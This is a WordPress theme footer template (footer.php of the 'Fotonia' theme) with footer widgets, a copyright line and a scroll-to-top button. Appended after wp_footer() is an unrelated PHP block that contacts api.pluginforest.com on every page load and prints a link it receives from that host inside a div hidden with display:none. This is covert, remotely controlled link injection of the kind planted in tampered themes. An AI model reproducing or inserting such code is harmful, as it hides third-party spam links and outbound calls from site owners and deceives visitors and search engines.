<footer itemscope="itemscope" itemtype="https://schema.org/WPFooter">
	<div class="container">
		<?php if ( is_active_sidebar( 'footer-one' ) || is_active_sidebar( 'footer-two' ) || is_active_sidebar( 'footer-three' ) ): ?>
		<div class="footer-widgets">
			<div class="row">
				<div class="col-md-4">
					<div class="foo-block">
						<?php dynamic_sidebar('footer-one'); ?>
					</div>
					<!--foo-block-->
				</div>
				<!--col-md-4-->
				<div class="col-md-4">
					<div class="foo-block">
						<?php dynamic_sidebar('footer-two'); ?>
					</div>
					<!--foo-block-->
				</div>
				<!--col-md-4-->
				<div class="col-md-4">
					<div class="foo-block foo-last">
						<?php dynamic_sidebar('footer-three'); ?>
					</div>
					<!--foo-block-->
				</div>
				<!--col-md-4-->
			</div>
			<!--row-->
		</div>
		<?php endif; ?>
		<?php if ( is_active_sidebar( 'footer-instagram' ) ): ?>
		<div id="footer-instagram">
			<?php dynamic_sidebar('footer-instagram'); ?>
		</div>
		<?php endif; ?>
		<div class="copyright">
			<?php $mt_footer_copy = get_theme_mod( 'mt_footer_copy', '&copy; Fotonia. Designed by MatchThemes.'); ?>  
			<div class="footer-copy">
				<span class="footer-year"><?php echo date_i18n(_x( 'Y', 'copyright date format', 'fotonia' )); ?></span>
				<?php echo wp_kses_post( $mt_footer_copy ); ?>
			</div>
		</div>
		<!--copyright-->
	</div>
	<!--container-->
</footer>
<?php
	$mt_scroll_top = get_theme_mod( 'mt_scroll_top', 'off');
	
	if($mt_scroll_top == 'on'):
	
	?>
<div class="scrollup">
	<a class="scrolltop" href="#">
	<i class="fa fa-chevron-up"></i>
	</a>
</div>
<?php endif; ?>
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>